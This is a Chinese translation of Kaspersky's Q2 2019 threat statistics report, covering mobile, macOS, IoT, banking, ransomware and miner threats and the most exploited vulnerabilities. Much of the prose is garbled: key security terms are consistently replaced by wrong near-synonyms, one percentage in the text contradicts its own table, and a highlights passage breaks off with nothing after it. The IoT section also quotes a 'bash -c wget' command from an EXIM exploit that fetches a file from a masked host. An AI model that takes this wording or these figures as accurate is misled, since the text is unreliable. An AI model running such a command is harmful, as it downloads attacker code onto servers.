卡巴斯基2019年Q2 IT威胁演变统计报告
宣布时间 2019-09-05目录
一、季度数字
二、移动威胁
2.1 季度亮点
2.2 移动威胁统计
2.3 移动恶意软件的类型漫衍
2.4 移动恶意软件Top20
2.5 移动威胁的地理漫衍
2.5.1 受攻击用户比例最高的国家Top 10
2.6 银行木马
2.6.1 受银行木马攻击比例最高的国家Top10
2.7 勒索软件
2.7.1 移动勒索软件Top10
三、macOS威胁
3.1 macOS威胁Top20
3.2 地理漫衍
四、物联网威胁
4.1 头条事务
4.2 物联网威胁统计
4.3 基于Telnet的攻击
4.3.1 Telnet攻击泉源的国家漫衍Top10
4.3.2 Telnet攻击中下载的恶意软件Top10
4.4 基于SSH的攻击
4.4.1 SSH攻击泉源的国家漫衍Top10
五、金融威胁
5.1 金融威胁统计
5.2 地理漫衍
5.2.1 受攻击用户的国家漫衍Top10
5.2.2 银行恶意软件家族Top10
六、勒索软件
6.1 季度亮点
6.2 新变种数目
6.3 受攻击用户数目
6.4 地理漫衍
6.4.1 受攻击用户的国家漫衍Top 10
6.5 勒索软件Top10
七、恶意矿工
7.1 新变种的数目
7.2 受攻击用户数目
7.3 地理漫衍
八、犯法分子重点关注的懦弱应用
8.1 通过网络资源提倡的攻击
8.1.1 网络攻击泉源国家的Top10
8.1.2 用户熏染危害最高的国家
8.2 外地威胁
8.2.2 外地熏染危害最高的国家
一、季度数字
__
凭证KSN的数据:
-
卡巴斯基清静解决计划阻止了全球203个国家的在线资源提倡的717,057,912次攻击
-
Web反病毒组件检测到217,843,293个差别的恶意URL
-
在228,206个用户的电脑上纪录到针对在线银行账户的恶意软件熏染事务
-
在232,292个用户的电脑上阻止了勒索软件攻击
-
文件反病毒系统检测到240,754,063个差别的恶意及潜在有害样本
-
卡巴斯基移动清静产品检测到:
-
753,550个恶意装置包
-
13,899个银行木马装置包
-
23,294个勒索软件装置包
二、移动威胁
__
2.1 季度亮点
2019年Q2有几个事务值得铭刻。
第一个是,名为Riltok的大规模金融威胁,它不但针对俄罗斯大型银行的客户,还瞄准一些外国银行的用户。
第二个,新恶意软件Trojan.AndroidOS.MobOk,其目的是通过WAP-Click付费订阅从手机帐户中窃取资金。受熏染装备会进入网络过载状态。详细来说,该木马会会见专门建设的恶意页面,使用第三方服务绕过验证码系统并点击按钮完成订阅。
第三个,商业特工软件,又被称为跟踪软件(stalkerware),通常来讲此类软件并不可被归类为恶意软件,但它确实会给用户带来危害。因此从4月3日最先,卡巴斯基Android清静软件会向用户忠言所有已知的商业特工软件。
第四个,一种新类型的广告软件(AdWare.AndroidOS.KeepMusic.a和AdWare.AndroidOS.KeepMusic.b),它可以绕过操作系统对后台运行程序的限制。为了避免历程被杀死,其中一个样本在后台启动了音乐播放器,播放一个无声的文件,使得操作系统以为用户在听音乐而不杀死其历程,现实上在装备的主屏幕上什么也没有显示。作为僵尸网络的一部分,该样本会向用户弹出广告,现实上这些广告也是在后台弹出,用户此时可能基础没有使用装备。

最后,在某些版本中,木马开发职员向俄罗斯最大的IT公司之一的管理者们表达了不友善的态度:

2.2 移动威胁统计
2019年Q2卡巴斯基共检测到753,550个恶意装置包,比上一季度镌汰了151,624个。
2018年Q3 – 2019年Q2,恶意装置包的数目比照
并且,与2018年Q2的数据相比这一数字已经下降了近100万。整体看来,今年移动平台新恶意软件的总数稳步下降,这种下降是由于最常见的恶意软件家族越来越少地添加新成员所致。
2.3 移动恶意软件的类型漫衍

2019年Q1和Q2,新移动恶意软件的类型漫衍
在2019年Q2检测到的所有威胁中,占比最高的是潜在有害的灰色软件(RiskTool),其份额为41.24%,比上一季度增添了11个百分点。在该种别中,最常见的样原来自于RiskTool.AndroidOS.Agent家族(占该类别的33.07%),RiskTool.AndroidOS.Smssend(15.68%)和RiskTool.AndroidOS.Wapron(14.41%)。
排在第二名的是广告软件,其份额增添了2.16个百分点,达18.71%。该种别中最常见的样天职别是AdWare.AndroidOS.Ewind(26.46%)、AdWare.AndroidOS.Agent(23.60%)和AdWare.AndroidOS.MobiDash(17.39%)。
木马类恶意软件(11.83%)排名第三,与上一季度相比增添了2.31个百分点。该种别样本数最多的是Trojan.AndroidOS.Boogr家族(32.42%) - 这一名称代指机械学习工具检测到的木马。其次是Trojan.AndroidOS.Hiddapp(24.18%)、Trojan.AndroidOS.Agent(14.58%)和Trojan.AndroidOS.Piom(9.73%)。请注重Agent和Piom是荟萃类的特征,涵盖了差别开发者的一系列木马样本。
木马释放器(Trojan-Dropper)种别下滑显着(10.04%),下降了15个百分点。该种别中大大都样本属于Trojan-Dropper.AndroidOS.Wapnor家族(71%),其它家族的份额均小于3%。一个典范的Wapnor家族成员由一张随机的色情图片、一个多态性dropper以及一个可执行文件组成。该恶意软件的使命是取代用户举行WAP付费订阅。
2019年Q2银行木马(banker)的份额稍微下降:1.84%,而Q1为3.21%。这一下降主要是由于Asacub家族新木马的镌汰所致。该种别最常见的样本属于Trojan-Banker.AndroidOS.Svpeng (30.79%)、Trojan-Banker.AndroidOS.Wroba(17.16%)和Trojan-Banker.AndroidOS.Agent(15.70%)。
2.4 移动恶意软件Top20
请注重排名中不包括任何潜在危险或有害的软件,例如灰色软件和广告软件
特征 %*
1
DangerousObject.Multi.Generic
44.37
2
Trojan.AndroidOS.Boogr.gsh
11.31
3
DangerousObject.AndroidOS.GenericML
5.66
4
Trojan.AndroidOS.Hiddapp.cr
4.77
5
Trojan.AndroidOS.Hiddapp.ch
4.17
6
Trojan.AndroidOS.Hiddapp.cf
2.81
7
Trojan.AndroidOS.Hiddad.em
2.53
8
Trojan-Dropper.AndroidOS.Lezok.p
2.16
9
Trojan-Dropper.AndroidOS.Hqwar.bb
2.08
10
Trojan-Banker.AndroidOS.Asacub.a
1.93
11
Trojan-Banker.AndroidOS.Asacub.snt
1.92
12
Trojan-Banker.AndroidOS.Svpeng.ak
1.91
13
Trojan.AndroidOS.Hiddapp.cg
1.89
14
Trojan.AndroidOS.Dvmap.a
1.88
15
Trojan-Dropper.AndroidOS.Hqwar.gen
1.86
16
Trojan.AndroidOS.Agent.rt
1.81
17
Trojan-SMS.AndroidOS.Prizmes.a
1.58
18
Trojan.AndroidOS.Fakeapp.bt
1.58
19
Trojan.AndroidOS.Agent.eb
1.49
20
Exploit.AndroidOS.Lotoor.be
1.46
*受攻击用户占比
与以前一样,Q2中Top20的第一名是DangerousObject.Multi.Generic(44.77%) - 这一特征代指云清静手艺检测到的恶意软件。当杀毒软件数据库缺少检测某一类恶意软件的数据而云清静手艺中包括相关信息时,该手艺的作用就凸显出来。基本上最新的恶意样本都是这样检测出来的。
第二和第三名划分是Trojan.AndroidOS.Boogr.gsh(11.31%)和DangerousObject.AndroidOS.GenericML(5.66%)。这些是由机械学习系统检测出的恶意样本。
第八名属于Trojan-Dropper.AndroidOS.Lezok.p(2.16%)。该木马会显示顽固型广告,通过短信付费订阅窃取款子以及为种种平台上的APP增添点击数。
Hqwar dropper家族划分获得第九(2.08%)和第十五名(1.86%)。该恶意软件通常用于隐藏银行木马。
第十和十一名是金融威胁Asacub家族:Trojan-Banker.AndroidOS.Asacub.a(1.93%)和Trojan-Banker.AndroidOS.Asacub.snt(1.92%)。与Hqwar dropper类似,该家族在2019年Q2丧失了大片份额。
2.5 移动威胁的地理漫衍

2019年Q2,移动恶意软件熏染的地理漫衍
2.5.1 受攻击用户比例最高的国家Top 10
国家* %**
1
伊朗
28.31
2
孟加拉国
28.10
3
阿尔及利亚
24.77
4
巴基斯坦
24.00
5
坦桑尼亚
23.07
6
尼日利亚
22.69
7
印度
21.65
8
印度尼西亚
18.13
9
斯里兰卡
15.96
10
肯尼亚
15.38
* 不包括卡巴斯基移动用户较少的国家(少于1万)
** 该国家所有卡巴斯基移动用户中受攻击的比例
Q2受攻击移动用户比例最高的国家是伊朗(28.31%),在2019年Q1它排在第二。被它取代的巴基斯坦(24%)现在排在第四。
大大都情形下,伊朗用户遇到的广告木马是Trojan.AndroidOS.Hiddapp.bn(21.08%)和潜在有害软件RiskTool.AndroidOS.FakGram.a(12.50%) - 该软件试图阻挡Telegram谈天信息 – 以及RiskTool.AndroidOS.Dnotua.yfe(12.29%)。
第三名是阿尔及利亚(24.77%),该国家用户最常遇到的是广告软件AdWare.AndroidOS.HiddenAd.et(27.15%)、AdWare.AndroidOS.Agent.f(14.16%)和AdWare.AndroidOS.Oimobi.a(8.04%)。
2.6 银行木马
在报告期内,我们共检测到13,899个移动银行木马装置包,险些是2019年Q1数字的一半。
2018年Q3 – 2019年Q2,银行木马装置包的数目比照
移动银行木马Top 10
特征 %*
|
1 |
Trojan-Banker.AndroidOS.Asacub.a |
13.64 |
|
2 |
Trojan-Banker.AndroidOS.Asacub.snt |
13.61 |
|
3 |
Trojan-Banker.AndroidOS.Svpeng.ak |
13.51 |
|
4 |
Trojan-Banker.AndroidOS.Svpeng.q |
9.90 |
|
5 |
Trojan-Banker.AndroidOS.Agent.ep |
9.37 |
|
6 |
Trojan-Banker.AndroidOS.Asacub.ce |
7.75 |
|
7 |
Trojan-Banker.AndroidOS.Faketoken.q |
4.18 |
|
8 |
Trojan-Banker.AndroidOS.Asacub.cs |
4.18 |
|
9 |
Trojan-Banker.AndroidOS.Agent.eq |
3.81 |
|
10 |
Trojan-Banker.AndroidOS.Faketoken.z |
3.13 |
* 受攻击用户百分比
2019年Q2移动银行木马Top10列表中Trojan-Banker.AndroidOS.Asacub的变种险些占有了一半的位置:十席之中占有了四席。然而,该家族上一季度的爆发式撒播在这一季度并没有重现。
2019年Q2,移动银行木马的地理漫衍
2.6.1 受银行木马攻击比例最高的国家Top10
国家* %**
1
南非
0.64%
2
俄罗斯
0.31%
3
塔吉克斯坦
0.21%
4
澳大利亚
0.17%
5
土耳其
0.17%
6
乌克兰
0.13%
7
乌兹别克斯坦
0.11%
8
韩国
0.11%
9
亚美尼亚
0.10%
10
印度
0.10%
* 不包括卡巴斯基移动用户较少的国家(少于1万)
** 该国家所有卡巴斯基移动用户中受银行木马攻击的比例
2019年Q2南非(0.64%)从上一季度的第四名攀升至第一位。该国家97%的攻击案例都与Trojan-Banker.AndroidOS.Agent.dx有关。
俄罗斯摘得第二名(0.31%),该国家最常见的木马家族是Asacub和Svpeng:Trojan-Banker.AndroidOS.Asacub.a(14.03%)、Trojan-Banker.AndroidOS.Asacub.snt(13.96%)和Trojan-Banker.AndroidOS.Svpeng.ak(13.95%)。
第三名属于塔吉克斯坦(0.21%),最常见的是Trojan-Banker.AndroidOS.Faketoken.z(35.96%)、Trojan-Banker.AndroidOS.Asacub.a(12.92%)和Trojan- Banker.AndroidOS.Grapereh.j(11.80%)。
2.7 勒索软件

2018年Q3 – 2019年Q2,移动勒索软件装置包的数目比照
2.7.1 移动勒索软件Top10
特征 %*
1
Trojan-Ransom.AndroidOS.Svpeng.aj
43.90
2
Trojan-Ransom.AndroidOS.Rkor.i
11.26
3
Trojan-Ransom.AndroidOS.Rkor.h
7.81
4
Trojan-Ransom.AndroidOS.Small.as
6.41
5
Trojan-Ransom.AndroidOS.Svpeng.ah
5.92
6
Trojan-Ransom.AndroidOS.Svpeng.ai
3.35
7
Trojan-Ransom.AndroidOS.Fusob.h
2.48
8
Trojan-Ransom.AndroidOS.Small.o
2.46
9
Trojan-Ransom.AndroidOS.Pigetrl.a
2.45
10
Trojan-Ransom.AndroidOS.Small.ce
2.22
* 受攻击用户百分比
2019年Q2撒播最普遍的勒索软件家族是Svpeng:占有了Top10中的3席。

2019年Q2移动勒索软件的地理漫衍
2.7.2 受勒索软件攻击比例最高的国家Top10
国家* %**
1
美国
1.58
2
哈萨克斯坦
0.39
3
伊朗
0.27
4
巴基斯坦
0.16
5
沙特阿拉伯
0.10
6
墨西哥
0.09
7
加拿大
0.07
8
意大利
0.07
9
新加坡
0.05
10
印度尼西亚
0.05
* 不包括卡巴斯基移动用户较少的国家(少于1万)
** 该国家所有卡巴斯基移动用户中受移动勒索软件攻击的比例
三、macOS威胁
Q2见证了几个有趣的事务,其中有三个特殊值得关注。
首先是macOS系统中曝出一个可绕过Gatekeeper和XProtect扫描的误差。使用该误差需要首先建设一个存档文件,文件中包括指向文件所在的共享NFS文件夹的符号链接。当翻开该文件时,系统会自动下载该共享NFS文件夹中的文件,而没有举行任何检查。使用该误差的首个恶意软件很快现身;但所有的检测样本看起来都更像是一个测试版,而不是现实的恶意软件。
其次是在Firefox浏览器中检测到的恣意代码执行误差(CVE-2019-11707,CVE-2019-11708),这两个误差可导致沙盒逃逸。在信息果真后,首个exp很快泛起,犯法分子使用这些误差释放木马家族Mokes和Wirenet的成员。
最后是一个分发恶意矿工的有趣载体。攻击者主要使用社交工程攻击和在正当APP中植入恶意代码。更为有趣的是,恶意代码是由一个QEMU模拟器和一个用于托管矿工的Linux虚拟机组成的。一旦QEMU在受熏染的机械上启动,矿工即在镜像中运行。这种模式相当离奇 – 无论是QEMU照旧矿工都消耗了大宗系统资源 – 这种木马不可能不被人发明。
3.1 macOS威胁Top20
特征 %*
1
Trojan-Downloader.OSX.Shlayer.a
24.61
2
AdWare.OSX.Spc.a
12.75
3
AdWare.OSX.Bnodlero.t
11.98
4
AdWare.OSX.Pirrit.j
11.27
5
AdWare.OSX.Pirrit.p
8.42
6
AdWare.OSX.Pirrit.s
7.76
7
AdWare.OSX.Pirrit.o
7.59
8
AdWare.OSX.MacSearch.a
5.92
9
AdWare.OSX.Cimpli.d
5.76
10
AdWare.OSX.Mcp.a
5.39
11
AdWare.OSX.Agent.b
5.11
12
AdWare.OSX.Pirrit.q
4.31
13
AdWare.OSX.Bnodlero.v
4.02
14
AdWare.OSX.Bnodlero.q
3.70
15
AdWare.OSX.MacSearch.d
3.66
16
Downloader.OSX.InstallCore.ab
3.58
17
AdWare.OSX.Geonei.as
3.48
18
AdWare.OSX.Amc.a
3.29
19
AdWare.OSX.Agent.c
2.93
20
AdWare.OSX.Mhp.a
2.90
* 受攻击macOS用户百分比
关于Q2最常见的macOS威胁,Shlayer.a木马(24.61%)坚持在榜首,排在第二名的是广告软件AdWare.OSX.Spc.a(12.75%)。第三名是AdWare.OSX.Bnodlero.t(11.98%),它将AdWare.OSX.Pirrit.j(11.27%)挤至第四。与上一季度一样,Top 20中的大大都都是广告软件,其中Pirrit家族又尤为突出:它们在Top20中占有了5个席位。
3.2 地理漫衍
国家* %**
|
1 |
法国 |
11.11 |
|
2 |
西班牙 |
9.68 |
|
3 |
印度 |
8.84 |
|
4 |
美国 |
8.49 |
|
5 |
加拿大 |
8.35 |
|
6 |
俄罗斯 |
8.01 |
|
7 |
意大利 |
7.74 |
|
8 |
英国 |
7.47 |
|
9 |
墨西哥 |
7.08 |
|
10 |
巴西 |
6.85 |
* 不包括卡巴斯基macOS用户较少的国家(少于1万)
** 该国家所有卡巴斯基macOS用户中受攻击的比例
四、物联网威胁
4.1 头条事务
在Linux/Unix威胁的天下里,最重大的事务是使用EXIM邮件代理新误差的攻击数目激增。简而言之,攻击者建设一个特殊的电子邮件,并在收件人字段中填写要在目的服务器上执行的代码,当通过目的服务器发送此邮件时,EXIM会执行这些恶意代码。

截获的攻击流量
上图中显示了一封在RCPT字段中包括shell剧本的邮件。该剧本现实上看起来如下:
|
1 |
/bin/bash -c "wget X.X.X.X/exm -O /dev/null |
4.2 物联网威胁统计
SSH
40.43%
Telnet
59.57%
2019年Q2,受攻击服务的漫衍
然而,凭证卡巴斯基蜜罐纪录的数据,SSH会话的数目从Q1的64%下降到Q2的49.6%。
|
SSH |
49.59% |
|
Telnet |
50.41% |
2019年Q2,卡巴斯基蜜罐纪录的会话漫衍
4.3 基于Telnet的攻击
2019年Q2,卡巴斯基蜜罐纪录的Telnet攻击泉源漫衍
4.3.1 Telnet攻击泉源的国家漫衍Top10
国家 %
|
1 |
埃及 |
15.06 |
|
2 |
中国 |
12.27 |
|
3 |
巴西 |
10.24 |
|
4 |
美国 |
5.23 |
|
5 |
俄罗斯 |
5.03 |
|
6 |
希腊 |
4.54 |
|
7 |
伊朗 |
4.06 |
|
8 |
中国台湾 |
3.15 |
|
9 |
印度 |
3.04 |
|
10 |
土耳其 |
2.90 |
一连两个季度,埃及(15.06%)排在Telnet攻击源的榜首,第二名与之差别不大,是中国(12.27%),第三名是巴西(10.24%)。
基于Telnet的攻击中犯法分子最常使用的工具是污名昭著的Mirai家族成员。
4.3.2 Telnet攻击中下载的恶意软件Top10
特征 %*
1
Backdoor.Linux.Mirai.b
38.92
2
Trojan-Downloader.Linux.NyaDrop.b
26.48
3
Backdoor.Linux.Mirai.ba
26.48
4
Backdoor.Linux.Mirai.au
15.75
5
Backdoor.Linux.Gafgyt.bj
2.70
6
Backdoor.Linux.Mirai.ad
2.57
7
Backdoor.Linux.Gafgyt.az
2.45
8
Backdoor.Linux.Mirai.h
1.38
9
Backdoor.Linux.Mirai.c
1.36
10
Backdoor.Linux.Gafgyt.av
1.26
* 受攻击用户比例
事实证实,没有任何理由去期待Mirai职位的转变,它仍是物联网攻击中最盛行的恶意软件家族。
4.4 基于SSH的攻击

2019年Q2,卡巴斯基蜜罐纪录的SSH攻击泉源漫衍
4.4.1 SSH攻击泉源的国家漫衍Top10
国家 %
1
越南
15.85
2
中国
14.51
3
埃及
12.17
4
巴西
6.91
5
俄罗斯
6.66
6
美国
5.05
7
泰国
3.76
8
阿塞拜疆
3.62
9
印度
2.43
10
法国
2.12
五、金融威胁
5.1 金融威胁统计
在2019年Q2,卡巴斯基产品共在228,206名用户的盘算机上阻止了针对银行账户的恶意软件攻击。
2019年Q2,受金融威胁攻击的用户数目
5.2 地理漫衍
为了评估和较量全球规模内银行木马和ATM/POS恶意软件的熏染危害,卡巴斯基统计了差别国家受此类威胁攻击的用户所占比例。

2019年Q2,银行恶意软件攻击的地理漫衍
5.2.1 受攻击用户的国家漫衍Top10
国家* %**
1
白俄罗斯
2.0
2
委内瑞拉
1.8
3
中国
1.6
4
印度尼西亚
1.3
5
韩国
1.3
6
塞浦路斯
1.2
7
巴拉圭
1.2
8
俄罗斯
1.2
9
喀麦隆
1.1
10
塞尔维亚
1.1
* 不包括卡巴斯基用户较少的国家(少于1万)
** 该国家所有卡巴斯基用户中受银行木马攻击的比例
5.2.2 银行恶意软件家族Top10
名称 特征 %*
1
RTM
Trojan-Banker.Win32.RTM
32.2
2
Zbot
Trojan.Win32.Zbot
23.3
3
Emotet
Backdoor.Win32.Emotet
8.2
4
Nimnul
Virus.Win32.Nimnul
6.4
5
Trickster
Trojan.Win32.Trickster
5.0
6
Nymaim
Trojan.Win32.Nymaim
3.5
7
SpyEye
Backdoor.Win32.SpyEye
3.2
8
Neurevt
Trojan.Win32.Neurevt
2.8
9
IcedID
Trojan-Banker.Win32.IcedID
1.2
10
Gozi
Trojan.Win32.Gozi
1.1
* 受攻击用户比例
与前一季度相比,2019年Q2的银行恶意软件Top3没有爆发转变。前两名的领先幅度较大,划分是Trojan-Banker.Win32.RTM(32.2%)和Trojan.Win32.Zbot(23.3%)。它们的份额划分增添了4.8和0.4个百分比。排在厥后的是Backdoor.Win32.Emotet(8.2%),它的份额相反是下跌了1.1个百分点。从6月份最先,Emotet C&C服务器的运动逐渐镌汰,到了Q3初期险些所有的C&C僵尸网络都已不可用。
六、勒索软件
6.1 季度亮点
经由18个月的起劲分发后,勒索软件GandCrab背后的犯法团伙宣布退出。凭证卡巴斯基的报告,该勒索软件成为最盛行的加密威胁之一。
在Q2,新勒索软件Sodin(又名Sodinokibi和REvil)最先举行撒播。该勒索软件有几点值得注重,它通过被入侵的服务器举行分发,并且使用了一个有数的LPE exp,更不必提其重大的加密模式。
照旧在Q2,泛起了一些针对都会管理部分的高调勒索软件攻击事务。这并不是一个新的趋势,入侵企业及市政网络举行诓骗是常见的攻击场景。但近年来此类事务的大规模爆发引起了人们对要害盘算机基础设施的清静性的关注,由于不但仅是小我私家和企业,整个社区都依赖于这些基础设施。
6.2 新变种的数目
2019年Q2卡巴斯基检测到8个新的勒索软件家族,并且发明了16,017个新变种。相比之下Q1的新变种数目是5,222个,只有Q2的三分之一。

2018年Q2 – 2019年Q2,勒索软件新变种的数目比照
大大都新变种属于Trojan-Ransom.Win32.Gen家族(基于行为规则自动检测到的种种木马)和Trojan-Ransom.Win32.PolyRansom。其中PolyRansom的变种数目是由其天性决议的 – 该蠕虫会建设自身的大宗突变体,并将这些变体替换为用户文件,将加密后的用户数据安排其中。
6.3 受攻击用户数目
2019年Q2卡巴斯基产品共掩护232,292个KSN用户阻止了勒索软件攻击,比上一季度镌汰了5万多。

2019年Q2,遭受勒索软件攻击的用户数目
受攻击用户数目最多的月份是4月(107,653),它甚至高于3月份的数字(106,519),这标记着Q1中上升趋势的延续。然而,在5月份这一数字最先下降,到了6月份只有82,000多一点。
6.4 地理漫衍

2019年Q2,受攻击用户的地理漫衍
6.4.1 受攻击用户的国家漫衍Top 10
国家* %**
|
1 |
孟加拉国 |
8.81% |
|
2 |
乌兹别克斯坦 |
5.52% |
|
3 |
莫桑比克 |
4.15% |
|
4 |
埃塞俄比亚 |
2.42% |
|
5 |
尼泊尔 |
2.26% |
|
6 |
阿富汗 |
1.50% |
|
7 |
中国 |
1.18% |
|
8 |
加纳 |
1.17% |
|
9 |
韩国 |
1.07% |
|
10 |
哈萨克斯坦 |
1.06% |
* 不包括卡巴斯基用户较少的国家(少于5万)
** 该国家所有卡巴斯基用户中受勒索软件攻击的比例
6.5 勒索软件Top10
** 受攻击用户比例* 卡巴斯基的检测效果
七、恶意矿工
7.1 新变种的数目
2019年Q2卡巴斯基检测到7,156个恶意矿工新变种,比Q1少了快要5,000。

2019年Q2,恶意矿工新变种的数目
4月份的新变种数目最多(3,101),险些比3月份多了近1000个,但平均下来新矿工照旧越来越少。
7.2 受攻击用户数目
Q2卡巴斯基在全球规模内共在749,766个用户的盘算机上检测到恶意矿工。

2019年Q2,受恶意矿工攻击的用户数目
整体来看,Q2受攻击用户数目逐渐镌汰 – 从4月份的383,000下降至6月份的318,000。
7.3 地理漫衍

受恶意矿工攻击的用户国家漫衍Top 10
国家* % 受攻击用户比例**
1
阿富汗
10.77%
2
埃塞俄比亚
8.99%
3
乌兹别克斯坦
6.83%
4
哈萨克斯坦
4.76%
5
坦桑尼亚
4.66%
6
越南
4.28%
7
莫桑比克
3.97%
8
乌克兰
3.08%
9
白俄罗斯
3.06%
10
蒙古
3.06%
* 不包括卡巴斯基用户较少的国家(少于5万)
** 该国家所有卡巴斯基用户中受恶意矿工攻击的比例
八、犯法分子重点关注的懦弱应用
在已往的一年中,Office套件成为最常受到攻击的应用程序。2019年Q2也不破例 – Office误差使用的比例从67%增添到72%。这一增添背后的缘故原由是大宗的垃圾邮件中包括了CVE-2017-11882、CVE-2018-0798和CVE-2018-0802误差使用。这些误差与Office的公式编辑器组件有关,使用了工具处置惩罚历程中的缓冲区溢出bug举行远程代码执行。其它常被犯法分子使用的Office误差还包括CVE-2017-8570和CVE-2017-8759。
Office误差使用的日益普及批注,犯法分子将其视为在目的盘算机上安排恶意软件的最简朴快捷方法。换句话说,这些误差使用更有可能乐成,由于它们的名堂使得可以使用种种手艺绕过静态的检测工具,并且其执行对用户是隐藏的,无需特另外行动,例如宏剧本。

2019年Q2,犯法分子使用的误差使用漫衍
在0day方面,Q2清静研究员SandboxEscaper宣布的exp尤其值得注重。这些exp被命名为PolarBear,使用了Windows 10中的提权误差CVE-2019-1069、CVE-2019-0863、CVE-2019-0841和CVE-2019-0973。
Q2网络攻击的占比继续增添。犯法分子没有遗忘针对未修补SMB系统的永恒之蓝攻击,也继续起劲在网络应用(如Oracle WebLogic)中引入新的误差使用。还要注重针对RDP服务和Microsoft SQLServer的密码攻击。可是,大大都用户面临的最大威胁照旧Q2中披露的误差 CVE-2019-0708。该误差影响了XP、win7和windows server 2008中的远程桌面服务。犯法分子可以使用它来获取远程控制权,并且建设类似于WanaCry的网络蠕虫。对传入数据包的不充分扫描允许攻击者使用UAF剧本笼罩内核内存中的数据。请注重该误差使用无需获取账户密码,即它爆发在验证用户名和密码之前的授权阶段。
8.1 通过网络资源提倡的攻击
8.1.1 网络攻击泉源国家的Top10
2019年Q2,网络攻击泉源的国家漫衍
本季度Web反病毒组件最常被美国的在线资源触发。整体来看,Top 4排名与前一季度没有转变。
8.1.2 用户熏染危害最高的国家
为了评估差别国家用户面临的在线熏染危害,卡巴斯基统计了该国家Web反病毒组件被触发的用户百分比。由此爆发的数据批注晰差别国家网络情形的侵略性。
该排名仅包括恶意软件类的攻击,不包括任何潜在有害或危险程序,例如灰色软件和广告软件。
国家* % 受攻击用户百分比**
1
阿尔及利亚
20.38
2
委内瑞拉
19.13
3
阿尔巴尼亚
18.30
4
希腊
17.36
5
摩尔多瓦
17.30
6
孟加拉国
16.82
7
爱沙尼亚
16.68
8
阿塞拜疆
16.59
9
白俄罗斯
16.46
10
乌克兰
16.18
11
法国
15.84
12
菲律宾
15.46
13
亚美尼亚
15.40
14
突尼斯
15.29
15
保加利亚
14.73
16
波兰
14.69
17
留尼汪
14.68
18
拉脱维亚
14.65
19
秘鲁
14.50
20
卡塔尔
14.32
* 不包括卡巴斯基用户较少的国家(少于1万)
** 该国家所有卡巴斯基用户中受恶意软件攻击的比例
平均而言,本季度全球12.12%的互联网用户遭到至少一次恶意软件攻击。

2019年Q2,恶意网络攻击的地理漫衍
8.2 外地威胁
2019年Q2卡巴斯基文件反病毒系统检测到240,754,063个恶意及潜在有害样本。
8.2.2 外地熏染危害最高的国家
国家* % 受攻击用户比例**
1
阿富汗
55.43
2
塔吉克斯坦
55.27
3
乌兹别克斯坦
55.03
4
也门
52.12
5
土库曼斯坦
50.75
6
老挝
46.12
7
叙利亚
46.00
8
缅甸
45.61
9
蒙古
45.59
10
埃塞俄比亚
44.95
11
孟加拉国
44.11
12
伊拉克
43.79
13
中国
43.60
14
玻利维亚
43.47
15
越南
43.22
16
委内瑞拉
42.71
17
阿尔及利亚
42.33
18
古巴
42.31
19
莫桑比克
42.14
20
卢旺达
42.02
这些数据包括用户盘算机或毗连到盘算机的可移动介质,例如u盘、相机内存卡、电话和外接硬盘等上检测到的恶意程序。
* 不包括卡巴斯基用户较少的国家(少于1万)
** 该国家所有卡巴斯基用户中受恶意软件类外地威胁攻击的比例

2019年Q2,外地威胁的地理漫衍
俄罗斯的这一数字是26.14%。
声明:本报告只是为了学习研究而翻译,无出书、发售等任何商业行为,因此差池任何版权问题肩负责任。


京公网安备11010802024551号